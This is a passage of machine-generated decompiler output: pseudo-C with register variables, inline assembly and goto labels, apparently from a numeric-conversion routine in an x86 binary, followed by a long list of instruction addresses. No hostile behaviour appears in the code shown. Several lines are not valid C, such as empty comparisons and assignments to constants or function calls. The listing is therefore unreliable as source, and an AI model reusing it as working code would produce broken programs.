							__eax = __esp[0x1a];
							__esi = __esp[0x12];
							__eax = __esp[0x1a] - __ebx;
						} else {
							__eax = __esp[0x12];
							__esi = __esp[0x12] + __ebx;
							__eax = __esp[0x1a];
						}
						__ecx = __esp[0x10];
						__edx = __esp[0x20];
						__ebp = __esp[0x19];
						__ebx = __ebx + __ecx;
						__ebx = __ebx - __esp[0xb];
						__edx = __esp[0x20] - __ecx;
						__ebx = __ebx - __ebp;
						__ecx = __ebx - __ebp + __edx;
						__eflags = __ebp - __ebx;
						__edx =  >  ? __ebx - __ebp + __edx : __edx;
						__ebx = __esi + __edx;
						__ebp = __eax + __edx;
						__eflags = __ebx - __ebp;
						__eax = __ebp;
						__eax =  <=  ? __ebx : __ebp;
						__eflags = __esi - __eax;
						__eax =  <=  ? __esi : __eax;
						__eflags = __eax;
						if(__eax > 0) {
							__ebx = __ebx - __eax;
							__ebp = __ebp - __eax;
							__esi = __esi - __eax;
							__eflags = __esi;
						}
						__eax = __esp[0x12];
						__eflags = __eax;
						if(__eax != 0) {
							__esp[1] = __eax;
							__eax = __esp[8];
							 *__esp = __esp[8];
							__eax = E0041A980();
							__esp[1] = __edi;
							 *__esp = __eax;
							__esp[8] = __eax;
							__eax = E0041A810();
							 *__esp = __edi;
							__esp[0x13] = __eax;
							E0041A680() = __esp[0x13];
							__edi = __esp[0x13];
						}
						__ebx = __ebx - __esp[0xd];
						__eflags = __ebx;
						if(__eflags > 0) {
							__edi = E0041AB00(__edi, __ebx);
						} else {
							if(__eflags != 0) {
								__ebx =  ~__ebx;
								 *__esp = __edi;
								__esp[1] = __ebx;
								__eax = L00419F30();
							}
						}
						__eax = __esp[0x1c];
						__eflags = __esp[0x1c];
						if(__esp[0x1c] > 0) {
							__eax = __esp[0x1a];
							__esp[1] = __esp[0x1a];
							__eax = __esp[0xc];
							 *__esp = __esp[0xc];
							__esp[0xc] = E0041A980();
						}
						__eflags = __ebp;
						if(__ebp > 0) {
							__eax = __esp[0xc];
							__esp[0xc] = E0041AB00(__esp[0xc], __ebp);
						}
						__eflags = __esi;
						if(__esi > 0) {
							__eax = __esp[8];
							__esp[8] = E0041AB00(__esp[8], __esi);
						}
						__eax = __esp[0xc];
						 *__esp = __edi;
						__esp[1] = __esp[0xc];
						__eax = E0041AC70();
						__eflags =  *(__eax + 0x10) - 1;
						__ebp = __eax;
						if( *(__eax + 0x10) > 1) {
							L48:
							__eax = __esp[8];
							__ebx =  *(__ebp + 0xc);
							 *(__ebp + 0xc) = 0;
							__eax = E0041AC20(__ebp, __esp[8]);
							__esi = __esp[0x1b];
							__eflags = __esi;
							if(__esi == 0) {
								L63:
								__eflags = __eax;
								if(__eflags < 0) {
									__eflags = __ebx;
									if(__ebx != 0) {
										L157:
										__esp[0x2d] = 0x11;
										goto L84;
									}
									__eflags = __esp[0x10] - 1;
									__esp[0x2d] = 0x21;
									if(__esp[0x10] > 1) {
										goto L84;
									}
									__ebx = __esp[0x19];
									__eflags = __esp[0x22] - __esp[0x19];
									if(__esp[0x22] == __esp[0x19]) {
										goto L84;
									}
									__eflags = __esp[0xe] & 0x00000001;
									if((__esp[0xe] & 0x00000001) != 0) {
										goto L84;
									}
									__ebp = E0041AB00(__ebp, 1);
									__eax = __esp[8];
									__eax = E0041AC20(__ebp, __esp[8]);
									__eflags = __eax;
									if(__eax <= 0) {
										goto L113;
									}
									__esp[0x2d] = 0x11;
									__esp[0xe] = 0;
									L127:
									__eax = __esp[0xb];
									__esp[0x2f] = __esp[0x2f] - __eax;
									__esp[0x2e] = __eax;
									__esp[1] = __eax;
									__eax = __esp[0x31];
									 *__esp = __esp[0x31];
									__esp[0x31] = E00412AF0();
									goto L84;
								}
								if(__eflags == 0) {
									__eflags = __ebx;
									if(__ebx == 0) {
										__eflags = __esp[0x10] - 1;
										if(__esp[0x10] == 1) {
											__ebx = __esp[0x19];
											__eflags = __esp[0x22] - __esp[0x19];
											__esp[0x2d] = 1;
											if(__esp[0x22] != __esp[0x19]) {
												goto L127;
											}
											__eax = __esp[0x31];
											__esp[0x2d] = 0x21;
											__eflags =  *(__eax + 0x10) - 1;
											if( *(__eax + 0x10) == 1) {
												__eflags =  *(__eax + 0x14) - 1;
												__esp[0x10] =  !=  ? __esp[0x1e] : __esp[0x10];
												__esp[0x1e] =  !=  ? __esp[0x1e] : __esp[0x10];
											}
											goto L84;
										}
										__esp[0x2d] = 0x21;
										L148:
										__esi = __esp[0x10];
										__eflags = __esp[0xb] - __esp[0x10];
										if(__esp[0xb] <= __esp[0x10]) {
											L150:
											__eax = __esp[0x31];
											__eflags =  *(__eax + 0x14) & 0x00000001;
											if(( *(__eax + 0x14) & 0x00000001) == 0) {
												goto L84;
											}
											__eflags = __ebx;
											if(__ebx != 0) {
												__eax = E00412630(__eax);
												__ecx =  *(__eax + 0x10);
												__edx = __esp[0x2e];
												__esp[0x31] = __eax;
												asm("bsr eax, [eax+ecx*4+0x10]");
												__edx =  ~__edx;
												__ecx =  ~__edx & 0x0000001f;
												__eax = __eax ^ 0x0000001f;
												__eflags = ( ~__edx & 0x0000001f) - __eax;
												if(( ~__edx & 0x0000001f) != __eax) {
													__edx = __edx + 1;
													__eflags = __edx;
													__esp[0x2e] = __edx;
												}
												__esp[0x2d] = 0x21;
												goto L84;
											}
											__eflags = __esp[0x10] - 1;
											if(__esp[0x10] == 1) {
												L144:
												 *(__eax + 0x10) = 0;
												__eax = __esp[0x19];
												__esp[0x2d] = 0x50;
												__esp[0x2f] = __esp[0x19];
												goto L84;
											}
											_t329 = __eax + 0x14; // 0x14
											__edx = _t329;
											__ecx = __edx + __eax * 4;
											while(1) {
												__eax =  *__edx;
												__eflags = __eax;
												if(__eax != 0) {
													break;
												}
												__edx = __edx + 4;
												 *(__edx - 4) = 0xffffffff;
												__eflags = __ecx - __edx;
												if(__ecx <= __edx) {
													goto L157;
												}
											}
											__eax = __eax - 1;
											__eflags = __eax;
											 *__edx = __eax;
											goto L157;
										}
										__eflags = __esp[0xe] & 0x00000001;
										if((__esp[0xe] & 0x00000001) == 0) {
											goto L113;
										}
										goto L150;
									}
									__eax = __esp[0xe];
									__eflags = __esp[0xe];
									if(__esp[0xe] == 0) {
										L158:
										__esp[0x2d] = 0x11;
										goto L148;
									}
									__ecx = __esp[0x2e];
									__esi = __esp[0x31];
									__eax = __ecx;
									_t291 = __esi + 0x14; // 0x14
									__edx = _t291;
									__eax = __ecx >> 5;
									__eax = __edx + (__ecx >> 5) * 4;
									__eflags = __edx - __eax;
									if(__edx >= __eax) {
										L135:
										__ecx = __ecx & 0x0000001f;
										__eflags = __ecx;
										if(__ecx == 0) {
											L137:
											__eax = __esp[0xb];
											__ebx = __esp[0x19];
											 *(__esi + 0x10) = 1;
											 *(__esi + 0x14) = 1;
											__esp[0x2e] = 1;
											__esp[0x2d] = 0x21;
											__eax = __esp[0xb] + __esp[0x19] - 1;
											__esp[0x2f] = __esp[0xb] + __esp[0x19] - 1;
											goto L114;
										}
										__eax = __eax | 0xffffffff;
										__eax = __eax << __cl;
										__eax = __eax |  *__edx;
										__eax = __eax + 1;
										__eflags = __eax;
										if(__eax != 0) {
											goto L158;
										}
										goto L137;
									}
									__eflags =  *(__esi + 0x14) - 0xffffffff;
									_t295 = __esi + 0x18; // 0x18
									__edx = _t295;
									if( *(__esi + 0x14) == 0xffffffff) {
										while(1) {
											__eflags = __edx - __eax;
											if(__edx >= __eax) {
												goto L135;
											}
											__edx = __edx + 4;
											__eflags =  *(__edx - 4) - 0xffffffff;
											if( *(__edx - 4) != 0xffffffff) {
												goto L158;
											}
										}
										goto L135;
									}
									goto L158;
								}
								__eax = __esp[8];
								__eax = E0041B160(__fp0, __ebp, __esp[8]);
								__fp0 =  *0x4a54e0;
								asm("fucomip st0, st1");
								if(__eflags < 0) {
									__fp0 =  *0x4a54e4;
									__eflags = __ebx - 1;
									asm("sbb eax, eax");
									__eax = __eax & 0x00000010;
									__eax = __eax + 0x10;
									__fp0 =  *0x4a54e4 * st0;
									asm("fxch st0, st1");
									__esp[0x21] = __eax;
									__eax = 0;
									__eflags = __ebx - 1;
									_t214 = __ebx - 1 > 0;
									__eflags = _t214;
									__eax = 0 | _t214;
									__esp[0x13] = _t214;
									asm("fst qword [esp+0x58]");
									__fp0 =  *0x4a54e8;
									asm("fucomip st0, st1");
									if(_t214 <= 0) {
										st0 = __fp0;
										st0 = __fp0;
										__fp0 = __esp[0x16];
										__esp[0x14] = 0;
										__esp[0x10] = __esp[0x16];
										L101:
										__esp[0xd] = 0;
										L53:
										__eax = __esp[0x2e];
										__esp[0x2f] = __esp[0x2f] + __eax;
										__eflags = __eax - __esp[0xb];
										__esp[0x15] = __esp[0x2f] + __eax;
										if(__eax < __esp[0xb]) {
											__eflags = __esp[0xe] & 0x00000001;
											if((__esp[0xe] & 0x00000001) == 0) {
												__esi = __esp[0xb];
												__ebx = __esi;
												__ebx = __esi - __eax;
												__eax = __esp[0x31];
												__eax = E0041AB00(__esp[0x31], __ebx);
												__esp[0x2f] = __esp[0x2f] - __ebx;
												__esp[0x31] = __eax;
												__esp[0x2e] = __esi;
											}
										}
										__eax =  &(__esp[0x2c]);
										__fp0 = __esp[0x10];
										__esp[3] =  &(__esp[0x2c]);
										__eax =  &(__esp[0x2b]);
										__esi = L0041AF50(__esp[0x10],  &(__esp[0x2b]));
										__eax = __esp[0x2b];
										__eflags = __eax;
										if(__eflags < 0) {
											__eax =  ~__eax;
											 *__esp = __esi;
											__esp[1] = __eax;
											__eax = L00419F30();
										} else {
											if(__eflags != 0) {
												__esi = __eax;
											}
										}
										__eax = __esp[0x13];
										__ebx = __esp[0x31];
										__esp[1] = __esi;
										__eflags = __esp[0x13];
										 *__esp = __ebx;
										if(__esp[0x13] != 0) {
											__eax = E0041AC70();
											__ecx = __esp[0xe];
											__esp[0x31] = __eax;
											__eflags = __esp[0xe];
											if(__esp[0xe] != 0) {
												goto L23;
											}
											__edx =  *(__ebx + 0x10);
											__ecx = __edx - 1;
											__eflags =  *(__eax + 0x10) - __ecx;
											if( *(__eax + 0x10) <= __ecx) {
												L21:
												__ecx = __esp[0x19];
												__eflags = __esp[0x22] - __esp[0x19];
												if(__esp[0x22] != __esp[0x19]) {
													__eax = E0041AB00(__eax, 1);
													 *__esp = __esi;
													__esp[0x31] = __eax;
													__esp[0x2f] = __esp[0x2f] - 1;
													_t163 =  &(__esp[0x22]);
													 *_t163 = __esp[0x22] - 1;
													__eflags =  *_t163;
													goto L74;
												}
												__eax = __esp[0x13];
												_t38 =  &(__esp[0x2e]);
												 *_t38 = __esp[0x2e] - 1;
												__eflags =  *_t38;
												__esp[0xe] = __esp[0x13];
												goto L23;
											}
											__edx = __edx + 3;
											asm("bsr ecx, [eax+edx*4+0x4]");
											asm("bsr edx, [ebx+edx*4+0x4]");
											__ecx = __ecx ^ 0x0000001f;
											__edx = __edx ^ 0x0000001f;
											__eflags = __edx - __ecx;
											if(__edx >= __ecx) {
												goto L23;
											}
											goto L21;
										} else {
											__eax = E004146F0();
											__edx =  *(__eax + 0x10);
											__esp[0x31] = __eax;
											__ecx = __edx - 1;
											__eflags =  *(__ebx + 0x10) - __ecx;
											if( *(__ebx + 0x10) <= __ecx) {
												L61:
												__edx = __esp[0xe];
												__eflags = __esp[0xe];
												if(__esp[0xe] == 0) {
													__esp[1] = 1;
													 *__esp = __eax;
													__eax = L00419F30();
													__esp[0x2f] = __esp[0x2f] + 1;
													__esp[0x22] = __esp[0x22] + 1;
													__esp[0x14] = 0;
												} else {
													__eax = __esp[0x2e];
													__eax = __esp[0x2e] + 1;
													__eflags = __eax - __esp[0xb];
													__esp[0x2e] = __eax;
													__eax = __al & 0x000000ff;
													__esp[0xe] = __al & 0x000000ff;
												}
												L23:
												E0041A680(__esi) = E0041A680(__ebx);
												__eax = __esp[0xd];
												__eflags = __esp[0xd];
												if(__esp[0xd] != 0) {
													goto L84;
												}
												L24:
												__esp[0x2e] = __esp[0x2e] + __esp[0x2f];
												__eflags = __esp[0x2e] + __esp[0x2f] - __esp[0x15];
												if(__esp[0x2e] + __esp[0x2f] != __esp[0x15]) {
													continue;
													do {
														do {
															do {
																L30:
																__eax = __esp[0xe];
																__eflags = __esp[0xe];
																if(__esp[0xe] == 0) {
																	goto L74;
																}
																goto L31;
															} while (__esp[0x2e] + __esp[0x2f] != __esp[0x15]);
															goto L25;
														} while (__eflags == 0);
														__esp[0x10] = __esp[0x10] *  *0x4a54f0;
														__esp[0x16] = st0;
														__fp0 = st0 -  *0x4a54e4;
														__fp0 = st2;
														asm("fchs");
														asm("fucomip st0, st1");
														if(__eflags <= 0) {
															st1 = __fp0;
															asm("fucomip st0, st1");
															if(__eflags <= 0) {
																goto L29;
															}
															goto L103;
														}
														st0 = __fp0;
														asm("fucomip st0, st1");
														st0 = __fp0;
														if(__eflags > 0) {
															break;
														}
														goto L30;
														L103:
														asm("fsubr dword [0x4a54dc]");
														__fp0 = __esp[0x16];
														asm("fxch st0, st1");
														asm("fucomip st0, st1");
														st0 = __fp0;
													} while (__eflags <= 0);
													__eax = __esp[0x21];
													__esp[0x2d] = __esp[0x2d] | __esp[0x21];
													goto L84;
												}
												L25:
												__eax = __esp[0x14];
												__eflags = __esp[0x14];
											}
											__edx = __edx + 3;
											asm("bsr ecx, [eax+edx*4+0x4]");
											asm("bsr edx, [ebx+edx*4+0x4]");
											__ecx = __ecx ^ 0x0000001f;
											__edx = __edx ^ 0x0000001f;
											__eflags = __edx - __ecx;
											if(__edx <= __ecx) {
												goto L23;
											}
											goto L61;
										}
									}
									asm("fnstcw word [esp+0x96]");
									__eax = __esp[0x25] & 0x0000ffff;
									__esp[0x25] = __ax;
									__eax = __esp[0x1b];
									asm("fldcw word [esp+0x94]");
									asm("fist dword [esp+0x50]");
									asm("fldcw word [esp+0x96]");
									__eflags = __eax - 1;
									asm("fild dword [esp+0x50]");
									asm("fst qword [esp+0x40]");
									asm("fsubp st1, st0");
									asm("fst qword [esp+0x58]");
									if(__eax == 1) {
										st0 = __fp0;
										st0 = __fp0;
										__eax = __esp[0x13];
										__eflags = __esp[0x13];
										if(__eflags == 0) {
											goto L101;
										}
										L99:
										asm("fldz");
										__fp0 = __esp[0x16];
										asm("fucomip st0, st1");
										st0 = __fp0;
										if(__eflags <= 0) {
											goto L101;
										}
										L100:
										__esp[0x14] = __esp[0x14] + 1;
										0x30 = 0x30 - __esp[0x21];
										__eflags = 0x30;
										asm("fild dword [esp+0x50]");
										__esp[0x21] = 0x30 - __esp[0x21];
										__esp[0x10] = __fp0;
										goto L101;
									}
									__eflags = __eax - 2;
									if(__eflags != 0) {
										asm("fucomip st0, st1");
										st0 = __fp0;
										if(__eflags >= 0) {
											goto L100;
										}
										goto L101;
									}
									st0 = __fp0;
									st0 = __fp0;
									__eax = __esp[0x13];
									__eflags = __esp[0x13];
									if(__eflags != 0) {
										goto L101;
									}
									goto L99;
								}
								st0 = __fp0;
								__eflags = __ebx;
								if(__ebx != 0) {
									asm("fld1");
									__esp[0x14] = 0;
									__esp[0x21] = 0x20;
									__esp[0xd] = 0;
									__esp[0x13] = 0;
									asm("fst qword [esp+0x40]");
									__esp[0x16] = __fp0;
									goto L53;
								}
								__esp[0xd] = 0;
								L68:
								__eflags = __esp[0x10] - 1;
								if(__esp[0x10] > 1) {
									L70:
									asm("fld1");
									__esp[0x14] = 0;
									__esp[0x21] = 0x10;
									__esp[0x13] = 1;
									asm("fst qword [esp+0x40]");
									__esp[0x16] = __fp0;
									goto L53;
								}
								__eflags = __esp[0xe] & 0x00000001;
								if((__esp[0xe] & 0x00000001) != 0) {
									__eax = __esp[0x31];
									__esp[0xe] = 1;
									goto L144;
								}
								goto L70;
							}
							__eflags = __eax;
							if(__eax > 0) {
								goto L63;
							}
							__eax = __esi;
							__eax = __esi & 0x00000001;
							__eax = __eax ^ __ebx;
							__eflags = __eax - __ebx;
							__esp[0xd] = __eax ^ __ebx;
							if(__eax == __ebx) {
								__eflags = __eax - 1;
								asm("sbb eax, eax");
								__eax = __eax & 0x00000010;
								__esp[0x2d] = __eax;
								goto L84;
							}
							__eflags = __ebx;
							if(__ebx == 0) {
								__esi = __esp[0x19];
								__eflags = __esp[0x22] - __esp[0x19];
								__esp[0x2d] = 0x11;
								if(__esp[0x22] == __esp[0x19]) {
									goto L68;
								}
								__edx = __esp[0xb];
								__eax = __esp[0x31];
								__eflags = __edx - 0x1f;
								if(__edx <= 0x1f) {
									__esi = __esp[0xb];
									L81:
									__eflags = __esi - 1;
									if(__esi <= 1) {
										L83:
										__ebx = __esp[0xb];
										__edx = __esp[0x22];
										 *__esp = __eax;
										__edx = __esp[0x22] - 1;
										__eflags = __edx;
										__esp[1] = __ebx;
										__esp[0x2e] = __ebx;
										__esp[0x2f] = __edx;
										__esp[0x31] = E00412AF0();
										goto L84;
									}
									_t179 = __ebx * 4; // 0x14
									__ebx = __eax + _t179 + 0x14;
									__ecx = 0;
									__esi = __esi - 1;
									__edx =  *__ebx;
									asm("repe bsf ecx, edx");
									__edx =  *__ebx >> __cl;
									__eflags = __esi;
									 *__ebx =  *__ebx >> __cl;
									if(__esi > 0) {
										goto L68;
									}
									goto L83;
								}
								__ecx =  *(__eax + 0x14);
								__eflags =  *(__eax + 0x14);
								if( *(__eax + 0x14) != 0) {
									goto L68;
								}
								__ecx = __esp[0x23];
								__esi = __ecx;
								while(1) {
									__edx = __edx - 0x20;
									__ebx = __ebx + 1;
									__eflags = __ecx - __edx;
									if(__ecx == __edx) {
										goto L81;
									}
									__eflags =  *(__eax + 0x14 + __ebx * 4);
									if( *(__eax + 0x14 + __ebx * 4) != 0) {
										goto L68;
									}
								}
								goto L81;
							}
							asm("fld1");
							__esp[0x2d] = 0x21;
							__esp[0x14] = 0;
							__esp[0x21] = 0x20;
							__esp[0x13] = 0;
							asm("fst qword [esp+0x40]");
							__esp[0x16] = __fp0;
							goto L53;
						} else {
							__ebx =  *(__eax + 0x14);
							__eflags =  *(__eax + 0x14);
							if( *(__eax + 0x14) == 0) {
								L84:
								__eax = __esp[0xe];
								__eflags = __esp[0xe];
								if(__esp[0xe] == 0) {
									L113:
									__eax = __esp[0x2e];
									__esp[0xe] = __esp[0x2e];
									L114:
									__eax = __esp[0xb];
									__eax = __esp[0xb] - __esp[0xe];
									__eflags = __eax;
									__esp[0xe] = __eax;
									if(__eflags == 0) {
										goto L85;
									}
									__eax = __esp[0x31];
									if(__eflags <= 0) {
										__edx = __esp[0xe];
										 *__esp = __eax;
										__edx =  ~(__esp[0xe]);
										__esp[1] =  ~(__esp[0xe]);
										__eax = L00419F30();
									} else {
										__ebx = __esp[0xe];
										__esp[0x31] = __eax;
									}
									__eax = __esp[0x2f];
									__eax = __esp[0x2f] - __esp[0xe];
									__esp[0xe] = 0;
									__esp[0x2f] = __eax;
									L86:
									__ebx = __esp[0x3f];
									 *(__esp[0x3f]) = __eax;
									E0041A680(__edi) = __esp[0xc];
									E0041A680(__esp[0xc]) = __esp[8];
									E0041A680(__esp[8]) = __esp[0x1d];
									E0041A680(__esp[0x1d]) = E0041A680(__ebp);
									__eax = __esp[0x3e];
									__edi = __esp[0x2f];
									__eflags =  *((intOrPtr*)(__eax + 8)) - __esp[0x2f];
									if( *((intOrPtr*)(__eax + 8)) >= __esp[0x2f]) {
										L12:
										__edi = __esp[0xe];
										__eax = __esp[0x31];
										__eflags = __esp[0xe];
										if(__esp[0xe] == 0) {
											L2:
											__ecx = __esp[0x3d];
											__eflags = __esp[0x3d];
											if(__esp[0x3d] != 0) {
												__edx = __esp[0x30];
												__edi = __esp[0x3d];
												 *(__esp[0x3d]) = __esp[0x30];
											}
											__edx = __esp[0x18];
											__eflags = __esp[0x18];
											if(__esp[0x18] != 0) {
												_t6 =  &(__esp[0x2d]);
												 *_t6 = __esp[0x2d] | 0x00000008;
												__eflags =  *_t6;
											}
											__eflags = __eax;
											if(__eax != 0) {
												__esp[2] = __eax;
												__eax = __esp[0xb];
												__esp[1] = __esp[0xb];
												__eax = __esp[0x40];
												 *__esp = __esp[0x40];
												E0041B270() = __esp[0x31];
												__eax = E0041A680(__esp[0x31]);
											}
											return  *((intOrPtr*)(_t357 + 0xb4));
										}
										__esi = __esp[0x1e];
										__ecx = __eax;
										__eflags = __esp[0x1e];
										if(__esp[0x1e] == 0) {
											__edx = __esp[0x2d];
											__ebx =  *(__eax + 0x10);
											__ecx = __edx;
											__edx = __edx & 0x00000030;
											__ecx = __ecx & 0xfffffff8;
											__eflags =  *(__eax + 0x10);
											if( *(__eax + 0x10) > 0) {
												__ecx = __ecx | 0x00000002;
												__eflags = __ecx;
											}
											__eflags = __edx;
											if(__edx != 0) {
												__ecx = __ecx | 0x00000040;
												__eflags = __ecx;
												__esp[0x2d] = __ecx;
												L0041B5C8();
												 *__eax = 0x22;
												__eax = __esp[0x31];
											} else {
												__esp[0x2d] = __ecx;
											}
										} else {
											 *(__ecx + 0x10) = 0;
											__esp[0x2d] = 0x50;
											L0041B5C8();
											 *__eax = 0x22;
											__eax = __esp[0x31];
										}
										goto L2;
									}
									__eax =  *(__eax + 0xc);
									__esp[8] = __eax;
									__eax = __eax & 0x00000003;
									__eflags = __eax - 2;
									if(__eax == 2) {
										__eax = __esp[0x18];
										__eflags = __esp[0x18];
										if(__esp[0x18] == 0) {
											L11:
											__eax = __esp[0x31];
											__esp[0x2d] = 0xa3;
											 *(__eax + 0x10) = 0;
											L0041B5C8();
											 *__eax = 0x22;
											__eax = __esp[0x3e];
											__edi = __esp[0x3f];
											__eax =  *(__esp[0x3e] + 8);
											__eax =  *(__esp[0x3e] + 8) + 1;
											__eflags = __eax;
											 *(__esp[0x3f]) = __eax;
											goto L12;
										}
										L90:
										__esp[0x31] = E0041A680(__esp[0x31]);
										__eax = __esp[0x3e];
										__edi = __esp[0x3f];
										__esp[0x31] = 0;
										__esp[0x2d] = 0x11;
										__eax =  *(__esp[0x3e] + 8);
										 *(__esp[0x3f]) =  *(__esp[0x3e] + 8);
										__eax = __esp[0x3e];
										__edi = __esp[0x40];
										__ecx =  *(__esp[0x3e]);
										__eax = __ecx + 0x1f;
										__eax = __ecx + 0x1f >> 5;
										__edx = __edi + (__ecx + 0x1f >> 5) * 4;
										__eax = __edi;
										__eflags = __edi - __edx;
										if(__edi >= __edx) {
											L93:
											__ecx = __ecx & 0x0000001f;
											__eflags = __ecx;
											if(__ecx != 0) {
												0x20 = 0x20 - __ecx;
												__ecx = 0x20 - __ecx;
												 *(__edx - 4) =  *(__edx - 4) >> __cl;
											}
											goto L12;
										}
										do {
											__eax = __eax + 4;
											 *(__eax - 4) = 0xffffffff;
											__eflags = __edx - __eax;
										} while (__edx > __eax);
										goto L93;
									}
									__eflags = __eax - 3;
									if(__eax == 3) {
										__ebp = __esp[0x18];
										__eflags = __esp[0x18];
										if(__esp[0x18] != 0) {
											goto L11;
										}
										goto L90;
									}
									__eflags = __eax - 1;
									if(__eax == 1) {
										goto L11;
									}
									goto L90;
								}
								L85:
								__eax = __esp[0x2f];
								goto L86;
							}
							goto L48;
						}
						L74:
						__eax = __esp[0x31];
						__eax = E0041A040(__esp[0x31]);
						__esp[0xe] = 0;
						__esp[0xd] = __eax;
						goto L31;
					}
				}
			}

0x00413940
0x00413940
0x00413940
0x00413942
0x00413942
0x00413942
0x00413946
0x00413948
0x00000000
0x00000000
0x0041394e
0x00413956
0x00413962
0x00413971
0x00413976
0x0041397a
0x00413980
0x00413985
0x00413988
0x0041398c
0x00413993
0x00413996
0x0041399d
0x004139a1
0x004139a5
0x004139b1
0x004139bc
0x004139be
0x004139c5
0x004139c5
0x004139c8
0x004139cb
0x004139ce
0x004139d1
0x004139dc
0x004139e0
0x004139e5
0x004139e9
0x004139f0
0x004139f7
0x004139f9
0x00413a00
0x00413a04
0x00413a06
0x00413a0b
0x00413a0d
0x00413a11
0x00413d13
0x00413d17
0x00413d1b
0x00413a17
0x00413a17
0x00413a1b
0x00413a1e
0x00413a1e
0x00413a22
0x00413a26
0x00413a2d
0x00413a31
0x00413a33
0x00413a37
0x00413a3b
0x00413a3d
0x00413a3f
0x00413a41
0x00413a44
0x00413a47
0x00413a4a
0x00413a4c
0x00413a4e
0x00413a51
0x00413a53
0x00413a56
0x00413a58
0x00413a5a
0x00413a5c
0x00413a5e
0x00413a5e
0x00413a5e
0x00413a60
0x00413a64
0x00413a66
0x00413a68
0x00413a6c
0x00413a70
0x00413a73
0x00413a78
0x00413a7c
0x00413a7f
0x00413a83
0x00413a88
0x00413a8b
0x00413a94
0x00413a98
0x00413a98
0x00413a9a
0x00413a9e
0x00413aa1
0x00413d0c
0x00413aa7
0x00413aa7
0x00414120
0x00414122
0x00414125
0x00414129
0x00414129
0x00413aa7
0x00413aad
0x00413ab1
0x00413ab3
0x00413ab5
0x00413ab9
0x00413abd
0x00413ac1
0x00413ac9
0x00413ac9
0x00413acd
0x00413acf
0x00413ad1
0x00413ae1
0x00413ae1
0x00413ae5
0x00413ae7
0x00413ae9
0x00413af9
0x00413af9
0x00413afd
0x00413b01
0x00413b04
0x00413b08
0x00413b0d
0x00413b11
0x00413b13
0x00413b20
0x00413b20
0x00413b24
0x00413b27
0x00413b35
0x00413b3a
0x00413b3e
0x00413b40
0x00413c80
0x00413c80
0x00413c82
0x00414301
0x00414303
0x00414628
0x00414628
0x00000000
0x00414628
0x00414309
0x0041430e
0x00414319
0x00000000
0x00000000
0x0041431f
0x00414323
0x0041432a
0x00000000
0x00000000
0x00414330
0x00414335
0x00000000
0x00000000
0x0041434b
0x0041434d
0x00414358
0x0041435d
0x0041435f
0x00000000
0x00000000
0x00414365
0x00414370
0x00414378
0x00414378
0x0041437c
0x00414383
0x0041438a
0x0041438e
0x00414395
0x0041439d
0x00000000
0x0041439d
0x00413c88
0x004143a9
0x004143ab
0x004145b5
0x004145ba
0x00414645
0x00414649
0x00414650
0x0041465b
0x00000000
0x00000000
0x00414661
0x00414668
0x00414673
0x00414677
0x0041467d
0x00414685
0x0041468a
0x0041468a
0x00000000
0x00414677
0x004145c0
0x004145cb
0x004145cb
0x004145cf
0x004145d3
0x004145e0
0x004145e0
0x004145e7
0x004145eb
0x00000000
0x00000000
0x004145f1
0x004145f3
0x0041469d
0x004146a2
0x004146a5
0x004146ac
0x004146b3
0x004146ba
0x004146bc
0x004146bf
0x004146c2
0x004146c4
0x004146c6
0x004146c6
0x004146c9
0x004146c9
0x004146d0
0x00000000
0x004146d0
0x004145f9
0x004145fe
0x00414551
0x00414551
0x00414558
0x0041455c
0x00414567
0x00000000
0x00414567
0x00414604
0x00414604
0x0041460a
0x0041461d
0x0041461d
0x0041461f
0x00414621
0x00000000
0x00000000
0x0041460f
0x00414612
0x00414619
0x0041461b
0x00000000
0x00000000
0x0041461b
0x00414623
0x00414623
0x00414626
0x00000000
0x00414626
0x004145d5
0x004145da
0x00000000
0x00000000
0x00000000
0x004145da
0x004143b1
0x004143b5
0x004143b7
0x00414638
0x00414638
0x00000000
0x00414638
0x004143bd
0x004143c4
0x004143cb
0x004143cd
0x004143cd
0x004143d0
0x004143d3
0x004143d6
0x004143d8
0x00414401
0x00414401
0x00414401
0x00414404
0x00414416
0x00414416
0x0041441a
0x0041441e
0x00414425
0x0041442c
0x00414437
0x00414442
0x00414446
0x00000000
0x00414446
0x00414406
0x00414409
0x0041440b
0x0041440d
0x0041440d
0x00414410
0x00000000
0x00000000
0x00000000
0x00414410
0x004143da
0x004143de
0x004143de
0x004143e1
0x004143fd
0x004143fd
0x004143ff
0x00000000
0x00000000
0x004143f0
0x004143f3
0x004143f7
0x00000000
0x00000000
0x004143f7
0x00000000
0x004143fd
0x00000000
0x004143e3
0x00413c8e
0x00413c99
0x00413c9e
0x00413ca4
0x00413ca6
0x00413f50
0x00413f56
0x00413f59
0x00413f5b
0x00413f5e
0x00413f61
0x00413f63
0x00413f65
0x00413f6c
0x00413f6e
0x00413f71
0x00413f71
0x00413f71
0x00413f74
0x00413f78
0x00413f7c
0x00413f82
0x00413f84
0x004140a5
0x004140a7
0x004140a9
0x004140ad
0x004140b5
0x00414011
0x00414011
0x00413b9b
0x00413b9b
0x00413ba9
0x00413bab
0x00413baf
0x00413bb3
0x00413bb5
0x00413bba
0x00414070
0x00414074
0x00414076
0x00414078
0x00414086
0x0041408b
0x00414092
0x00414099
0x00414099
0x00413bba
0x00413bc0
0x00413bc7
0x00413bcb
0x00413bcf
0x00413be2
0x00413be4
0x00413beb
0x00413bed
0x00414053
0x00414055
0x00414058
0x0041405c
0x00413bf3
0x00413bf3
0x00413c01
0x00413c01
0x00413bf3
0x00413c03
0x00413c07
0x00413c0e
0x00413c12
0x00413c14
0x00413c17
0x00413873
0x00413878
0x0041387c
0x00413883
0x00413885
0x00000000
0x00000000
0x00413887
0x0041388a
0x0041388d
0x00413890
0x004138a9
0x004138a9
0x004138ad
0x004138b4
0x00413d2d
0x00413d32
0x00413d35
0x00413d3c
0x00413d44
0x00413d44
0x00413d44
0x00000000
0x00413d51
0x004138ba
0x004138be
0x004138be
0x004138be
0x004138c6
0x00000000
0x004138c6
0x00413892
0x00413895
0x0041389a
0x0041389f
0x004138a2
0x004138a5
0x004138a7
0x00000000
0x00000000
0x00000000
0x00413c1d
0x00413c1d
0x00413c22
0x00413c25
0x00413c2c
0x00413c2f
0x00413c32
0x00413c4f
0x00413c4f
0x00413c53
0x00413c55
0x004140f2
0x004140fa
0x004140fd
0x00414102
0x0041410a
0x00414112
0x00413c5b
0x00413c5b
0x00413c62
0x00413c65
0x00413c69
0x00413c73
0x00413c76
0x00413c76
0x004138d0
0x004138db
0x004138e0
0x004138e4
0x004138e6
0x00000000
0x00000000
0x004138ec
0x004138f3
0x004138fa
0x004138fe
0x00000000
0x00413942
0x00413942
0x00413942
